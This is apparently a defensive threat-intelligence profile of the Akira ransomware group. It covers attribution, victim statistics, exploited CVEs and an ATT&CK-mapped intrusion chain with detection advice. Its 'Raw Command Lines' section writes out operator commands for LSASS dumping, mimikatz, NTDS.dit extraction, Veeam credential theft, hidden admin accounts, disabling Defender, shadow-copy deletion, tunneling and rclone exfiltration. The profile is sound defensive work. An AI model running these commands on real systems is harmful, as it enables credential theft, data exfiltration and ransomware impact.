Akira - ShroudCloud

# Akira Ransomware (Storm-1567 / Howling Scorpius / GOLD SAHARA) **Type:** Ransomware-as-a-Service (RaaS) - Closed Affiliate Model **Also tracked as:** Storm-1567 (Microsoft), Howling Scorpius (Palo Alto/Unit 42), GOLD SAHARA (Secureworks), Punk Spider (CrowdStrike) **First observed:** March 2023 **Status:** Active - #2 most prolific RaaS operation Q1 2026 (194 victims). $244M in total ransom proceeds as of late September 2025. FBI/CISA joint advisory updated November 2025. No law enforcement disruption to date. --- ## Threat Overview Closed RaaS with Conti lineage, operating since March 2023. Blockchain analysis (Arctic Wolf) confirmed $600K+ in ransom payments routed to Conti-affiliated wallets. Code shares ChaCha encryption implementation, string obfuscation routines, and identical file extension exclusion lists with Conti. TRM Labs assesses Russian-based developers, though Akira's malware notably lacks the typical CIS keyboard layout check - possibly to obscure attribution. **Double extortion** Data exfil via Rclone/WinSCP/FileZilla → encryption via ChaCha20 + RSA-4096 hybrid. Leak site: retro ASCII-art terminal aesthetic (Tor). Connected to Fog and Frag ransomware via shared Defiway bridge laundering infrastructure (TRM Labs). | Field | Value | |---|---| | Ransom note | `akira_readme.txt` / `powerranges.txt` / `akiranew.txt` | | File extension | `.akira`, `.powerranges` (Megazord), `.akiranew` (v2) | | Contact | Tor negotiation portal | | Encryption | ChaCha20 + RSA-4096 (Windows), AES/CAMELLIA/DES/IDEA (Linux/ESXi) | | Top targets (geo) | US, Canada, Brazil, Australia, UK, Germany | | Top targets (sector) | Manufacturing, professional services, technology, education, finance, healthcare | | Avg dwell time | <4 hours typical, sub-1-hour observed (Halcyon) | | Variants | Windows C++ (original), Megazord (Rust), Akira_v2 (Rust), Linux/ESXi C++ | --- ## Activity Standing Volume leader. Q1 2026: **Qilin** (342 victims), **Akira** (194), LockBit5, SafePay, Sinobi. Monthly breakdown: 71 (Jan) → 39 (Feb) → 84 (Mar) - the February dip suggests temporary disruption, not decline. March rebound more than doubled February output. Total leak site victims: ~1,420 (ransomware.live). ~980 posted in 2025 alone, making Akira the most prolific ransomware group by total ransom proceeds in 2025 ($150M in 2025; $244M cumulative). In March 2026, Akira dropped 30+ victims on its leak site in a single day. Retro ASCII-art styled leak site differentiates it from competitors. Blockchain analysis (Arctic Wolf) links ransom payments directly to Conti-affiliated wallet addresses - at least three transactions totaling $600K+ USD sent to Conti wallets. Code similarities (ChaCha encryption implementation, string obfuscation, avoided file extensions) confirm shared developer lineage. TRM Labs assesses developers are likely Russia-based. --- ## Initial Access **Primary:** Compromised VPN credentials targeting Cisco ASA/FTD without MFA. Exploits CVE-2023-20269 (Cisco ASA/FTD zero-day allowing brute force without rate limiting) and CVE-2020-3259 (Cisco information disclosure). No successful attacks observed against orgs with properly configured MFA (Rapid7, Arctic Wolf). **Secondary:** Veeam exploitation - CVE-2023-27532 (credential extraction, CVSS 7.5) and CVE-2024-40711 (unauthenticated RCE, CVSS 9.8). SonicWall VPN via CVE-2024-40766. Spear phishing. IAB-purchased access. **Scale:** 250+ organizations compromised as of April 2024 FBI advisory. 1,420+ total victims through Q1 2026. --- ## Infection Chain ### Step 1 - Initial Access: VPN Credential Exploitation T1078, T1190 | Operator Brute force or credential stuffing against Cisco ASA/FTD VPN endpoints lacking MFA. CVE-2023-20269 enables unlimited brute force attempts against AAA functions without rate limiting. Also exploits Veeam Backup & Replication (CVE-2023-27532, CVE-2024-40711) and SonicWall VPN (CVE-2024-40766) as alternative vectors. IAB-purchased access supplements direct exploitation. > **Detection:** VPN brute force lives in network/auth logs, not endpoint telemetry. Monitor VPN concentrator logs for high-volume authentication failures from single sources, and correlate successful VPN logins with anomalous post-authentication behavior (e.g., RDP to multiple hosts within minutes of VPN connect, especially outside business hours). ### Step 2 - Reconnaissance T1018, T1016, T1033, T1087.002 | Operator Standard HOK discovery: `net group "Domain Admins"`, `nltest /dclist:`, `whoami`, `ipconfig /all`. Uses AdFind for LDAP enumeration, SoftPerfect Network Scanner / Advanced IP Scanner for host discovery, `fsutil fsinfo drives` for volume enumeration, `Get-ADComputer -Filter *` for domain inventory. > **Detection:** Alert on domain trust enumeration via `nltest /dclist` and `nltest /domain_trusts`. Detect privileged group enumeration commands (`net group "Domain Admins"`, `net localgroup administrators`). Flag AdFind execution - any `adfind.exe` process with LDAP query arguments is high-fidelity. Watch for deployment or execution of network scanning tools (SoftPerfect `netscan.exe`, Advanced IP Scanner) on endpoints where they are not expected. > > See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-adfind-enum]] | [[edr-win-disc-netscan-deployment]] ### Step 3 - Credential Access T1003.001, T1003.003, T1558.003, T1555 | Operator LSASS dump via comsvcs.dll (`rundll32.exe comsvcs.dll, MiniDump`). Mimikatz (`sekurlsa::logonPasswords`). Kerberoasting. NTDS.dit extraction via ntdsutil (`create full c:\Programdata\temp\Crashpad\Temp\abc`). Veeam credential extraction via `sqlcmd.exe` querying VeeamBackup database or `Veeam-Get-Creds.ps1`. Registry hive dumps (SAM/SECURITY/SYSTEM). > **Detection:** Detect LSASS memory dumps by watching for `rundll32.exe` loading `comsvcs.dll` with `MiniDump` in the command line. Alert on `sqlcmd.exe` querying the `VeeamBackup` database `Credentials` table - this is almost always malicious. Flag `ntdsutil` with `ifm` and `create full` arguments (offline AD database capture). Monitor for Kerberoasting patterns: high-volume TGS requests for SPNs with RC4 encryption from a single source. Detect registry hive dumps (`reg save HKLM\SAM`, `SECURITY`, `SYSTEM`). > > See rule(s): [[edr-win-cred-lsass-minidump]] | [[edr-win-cred-veeam-db-access]] | [[edr-win-cred-reg-hive-dump]] ### Step 4 - Persistence T1136.001, T1133, T1219 | Operator Creates local admin accounts (observed: `John`, `itadm`, `point`). Hides accounts from Welcome screen via registry (`SpecialAccounts\UserList`). Deploys AnyDesk, LogMeIn, or RustDesk for persistent RMM access. Cloudflare tunnel (`cloudflared.exe tunnel run --token`). Ngrok or Ligolo-ng tunneling via nssm.exe as fake "sysmon" service. Disables password expiry. > **Detection:** Alert on local account creation via `net user /add` with subsequent addition to local administrators. Detect unexpected RMM tool installation (AnyDesk, LogMeIn, RustDesk, RustDesk) by process name or PE metadata on endpoints without sanctioned RMM. Flag reverse tunneling tools: `cloudflared.exe`, `ngrok.exe`, `ligolo`. Watch for `nssm.exe` installing services - especially when the service name mimics legitimate tools (e.g., "sysmon"). > > See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]] ### Step 5 - Defense Evasion T1562.001, T1562.004 | Both PowerTool or KillAV tool abuses Zemana AntiMalware driver to terminate AV/EDR processes at kernel level. Also uses Terminator tool. Disables Windows Defender via PowerShell (`Set-MpPreference -DisableRealtimeMonitoring $true`). Adds Defender exclusions to `C:\`. Uninstalls EDR agents. Opens RDP via netsh firewall rule. Deletes volume shadow copies via PowerShell WMI (`Get-WmiObject Win32_Shadowcopy | Remove-WmiObject`). > **Detection:** Detect Defender tampering by monitoring for `Set-MpPreference` with `-DisableRealtimeMonitoring` or broad exclusion paths in PowerShell command lines. Alert on volume shadow copy deletion via WMI (`Win32_Shadowcopy` combined with `Delete` or `Remove-WmiObject`). For BYOVD-based EDR killers (PowerTool, KillAV, Terminator), monitor for loading of known vulnerable drivers (Zemana `zam64.sys`/`zamguard64.sys`) and for processes with display names matching these tools. This remains a detection gap across most EDR platforms - kernel-level driver abuse requires driver load monitoring and vulnerable driver blocklisting. > > See rule(s): [[edr-win-def-defender-tampering]] | [[edr-win-impact-inhibit-recovery]] ### Step 6 - Lateral Movement T1021.001, T1021.002, T1047 | Operator RDP with compromised domain admin credentials (primary - 100+ RDP sessions observed in single intrusion). SMB for file transfer. Impacket wmiexec.py for remote command execution. Remote service creation. Cobalt Strike Beacon for C2-directed movement. > **Detection:** Detect Impacket-style remote execution by alerting on WMI process creation from `wmiprvse.exe` spawning `cmd.exe` with encoded or suspicious command lines. Flag remote PsExec-style service creation. Monitor for anomalous RDP session volume from single accounts - 100+ RDP sessions from one account in a short window is a strong lateral movement indicator. Detect SMB-based file transfers of executables or scripts to `ADMIN

or `C

shares. > > See rule(s): [[edr-win-lat-impacket-wmiexec]] | [[edr-win-lat-remote-psexec]] ### Step 7 - Exfiltration T1048, T1560.001, T1567 | Operator Data staging with WinRAR (`WinRAR.exe a -ep1 -scul -r0`). Exfiltration via Rclone, WinSCP, FileZilla, or MegaSync to attacker-controlled cloud storage. Filters high-value extensions (docx, xlsx, pdf, pst, mdb). Exfil completed in as little as 2 hours from initial access. > **Detection:** Detect Rclone via PE metadata and command-line patterns (`copy`, `sync` with `remote:` arguments) rather than filename - renamed variants are common. Watch for WinRAR command lines with recursive archiving of high-value file types. Alert on bulk outbound data transfers to cloud storage services (Mega, unknown WebDAV/S3 endpoints). Monitor for WinSCP or FileZilla execution on servers where these tools are not standard. > > See rule: [[edr-win-exfil-rclone-usage]] ### Step 8 - Impact (Encryption) T1486, T1490 | Malware Windows: `w.exe -p=<path> -n=2` or `Akira.exe --encryption_percent=10`. ChaCha20 + RSA-4096 hybrid - partial encryption for large files (.vmdk, databases) for speed. Megazord variant (Rust): `.powerranges` extension, 85+ service termination commands. Akira_v2 (Rust): `.akiranew`, Build ID required for execution, `vmonly`/`stopvm` ESXi modes. Linux/ESXi variant targets VMware infrastructure directly. > **Detection:** Monitor for mass file renaming with known ransomware extensions. Alert on volume shadow copy deletion (pre-encryption indicator). Detect mass service/process termination sequences - Akira kills 85+ services before encryption. On ESXi, watch for unauthorized `esxcli vm process kill` or `vim-cmd vmsvc/power.off` commands. Behavioral ransomware detection (rapid sequential file writes with entropy changes) is the primary coverage - static signatures for encryptor binaries are trivially evaded via recompilation. > > See rule: [[edr-win-impact-inhibit-recovery]] --- ## Raw Command Lines Observed operator commands from CISA advisory (AA24-109A), Sophos, Kroll, Unit 42, and IBM X-Force IR reports. `[R]` = reconstructed from described behavior. **Reconnaissance** ``` whoami ipconfig /all nltest /dclist: net group "Domain Admins" /domain fsutil.exe fsinfo drives Get-ADComputer -Filter * -Properties * cmd.exe /c "%TMP%\adfind.exe" -f objectcategory=computer -csv name cn OperatingSystem dNSHostName ``` **Credential access** ``` cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full %TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\Crashpad\Temp\abc" q q cmd.exe /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -o C:\programdata\nt.txt sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];" ``` **Account creation** ``` net.exe user /add John Jhn1234Abc! net localgroup administrators John /add reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f [R] ``` **Defense evasion** ``` Set-MpPreference -DisableRealtimeMonitoring $true powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" netsh.exe advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``` **Persistence / tunneling** ``` C:\ProgramData\cloudflared.exe tunnel run --token [REDACTED] nssm.exe install sysmon C:\ProgramData\sysmon.exe [R] ``` **Lateral movement** ``` wmiexec.py DOMAIN/admin:[email protected] [R] ``` **Exfiltration** ``` "C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 [R] rclone copy \\<FILESERVER>\shares remote:exfil-bucket --include "*.docx" --include "*.xlsx" --include "*.pdf" --include "*.pst" --transfers 16 [R] ``` **Encryption** ``` C:\ProgramData\w.exe -p=C:\Users\%USERNAME%\Desktop\MyFiles -n=2 Akira.exe --encryption_percent=10 powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}" ``` --- ## Intelligence Gaps - **Affiliate structure opaque** - Closed model but affiliate boundaries unclear. Shared Defiway infrastructure with Fog and Frag suggests operational cooperation - unclear if same affiliates or resource-sharing. - **PowerTool/KillAV mechanics underdocumented** - CISA confirms Zemana driver abuse but no public analysis of exact IOCTLs or driver hashes. Cannot build precise BYOVD detection without them. - **Conti lineage depth unknown** - Blockchain confirms financial links. Code confirms shared routines. Whether Akira is a Conti rebrand, a fork by ex-Conti developers, or a separate group using Conti source code remains unresolved. - **Sub-1-hour dwell cases** - Halcyon documented full kill chain in under an hour. If this is the norm rather than exception, traditional hunt cadence (daily/weekly) is insufficient. - **Megazord vs Akira_v2 deployment logic** - Actors use both interchangeably (CISA). No public analysis of affiliate selection criteria between variants. - **No OFAC sanctions** - Despite $244M in proceeds and a joint FBI/CISA advisory, no sanctions, indictments, or disruption operations. Enforcement posture may change. --- ## Confidence Assessment | Claim | Confidence | Evidence | Flips if... | |---|---|---|---| | Conti developer lineage | HIGH | Arctic Wolf blockchain ($600K+ to Conti wallets), code overlap (ChaCha, string obfuscation) | Conti source code widely leaked - could be independent fork | | Russia-based developers | MEDIUM | TRM Labs assessment, CIS targeting exclusions absent (unusual) | Deliberate misdirection re: keyboard checks | | RaaS closed model | HIGH | CISA advisory, consistent TTPs across incidents | Public affiliate recruitment surfaces | | $244M cumulative proceeds | HIGH | FBI/CISA AA24-109A (Nov 2025 update), TRM blockchain | Self-reported/inflated by duplicate counting | | Fog/Frag operational link | MEDIUM | Shared Defiway bridge, wallet clustering (TRM Labs) | Infrastructure purchased on open market | | Q1 2026 #2 by volume | HIGH | Ransomware.live, Breachsense, Ransom-DB concordance | Leak site counts != actual victims | --- ## Detections Sigma rules applicable to this threat: | Rule ID | Description | |---|---| | [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net | | [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest | | [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration | | [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution | | [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll | | [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access | | [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump | | [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement | | [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution | | [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration | | [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition | | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | | [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment | --- ## Key Publications 1. [CISA/FBI - #StopRansomware: Akira Ransomware (AA24-109A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) (Apr 2024, updated Nov 2025) 2. [Arctic Wolf - Conti and Akira: Chained Together](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) (2023) 3. [Sophos - Akira, Again: The Ransomware That Keeps on Taking](https://www.sophos.com/en-us/blog/akira-again-the-ransomware-that-keeps-on-taking) (Dec 2023) 4. [Unit 42/Palo Alto - Howling Scorpius Threat Assessment](https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/) (2024) 5. [Cisco Talos - Akira Ransomware Continues to Evolve](https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/) (2023) 6. [TRM Labs - Akira Ransomware Group: Threat Profile](https://www.trmlabs.com/resources/intel-library/akira) (2025) 7. [Trend Micro - Ransomware Spotlight: Akira](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira) (2024) 8. [Kroll - Akira Ransomware Deep Dive](https://www.kroll.com/en/publications/cyber/akira-ransomware-deep-dive) (Q4 2023) 9. [Halcyon - Akira Ransomware Attacks in Under an Hour](https://www.halcyon.ai/ransomware-research-reports/akira-ransomware-attacks-in-under-an-hour) (2024) 10. [Picus - Akira Ransomware Analysis and Simulation](https://www.picussecurity.com/resource/blog/akira-ransomware-analysis-simulation-and-mitigation-cisa-alert-aa24-109a) (2025) 11. [Ransomware.live - Akira Tracker](https://www.ransomware.live/group/akira) (ongoing) 12. [Breachsense - March 2026 Ransomware Report](https://www.breachsense.com/ransomware-reports/march-2026/) (Mar 2026)